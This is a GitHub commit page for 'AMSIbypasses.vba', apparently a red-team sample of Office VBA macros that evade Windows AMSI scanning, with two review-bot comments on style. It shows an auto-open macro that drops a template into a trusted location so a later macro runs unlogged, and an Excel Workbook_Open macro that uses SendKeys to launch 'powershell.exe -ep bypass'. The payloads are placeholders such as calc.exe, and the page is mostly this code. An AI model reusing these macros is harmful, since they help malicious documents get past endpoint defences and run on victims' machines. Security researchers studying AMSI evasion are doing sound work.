Commit
Update AMSIbypasses.vba
stanhegt authored Apr 2, 2019
1 parent 3cb10d3 commit 6b8f582
Showing 1 changed file with 3 additions and 2 deletions.
5 changes: 3 additions & 2 deletions AMSIbypasses.vba
Expand Up @@ -8,6 +8,7 @@
' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)
' ##################################################################################

Sub autoopen()
'function called by the initial 'dropper' code, drops a dotm into %appdata\microsoft templates
curfile = ActiveDocument.Path & "\" & ActiveDocument.Name
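Review bot: the comment at the top of `autoopen` gives the drop path as `%appdata\microsoft templates`, with no closing `%` on the variable and no separator before `templates`, so it does not state which trusted location the sample depends on; close the variable name and write the folder as a proper path. `curfile` is assigned with no declaration visible in this hunk, so adding `Option Explicit` and a `Dim curfile As String` would catch a misspelled name at compile time. The only change visible here appears to be the blank line after the banner, which the commit message "Update AMSIbypasses.vba" does not mention.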
Expand All @@ -25,18 +26,18 @@ End Sub
Sub autonew()
' this function is called from a trusted location, not in the AMSI logs
Shell "calc.exe"
End Sub
End Sub


' ##################################################################################
' AMSI Bypass approach that abuses Excel sendkeys to fireup the startmennu
' ##################################################################################

Private Sub Workbook_Open()
On Error Resume Next
Application.SendKeys "^{esc}"
Application.Wait (Now() + TimeValue("00:00:01"))
Application.SendKeys "powershell.exe -ep bypass read-host ""malicious"" ~"

End Sub

' ##################################################################################
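Review bot: the two consecutive `End Sub` lines after `Shell "calc.exe"` in `autonew` read as the removed and added versions of the same line, so this hunk looks like a whitespace-only change; the commit message should say that instead of "Update AMSIbypasses.vba". Since the region is being touched anyway, fix the banner comment "fireup the startmennu" (it should read "fire up the Start menu") and drop the empty line before `End Sub` in `Workbook_Open`.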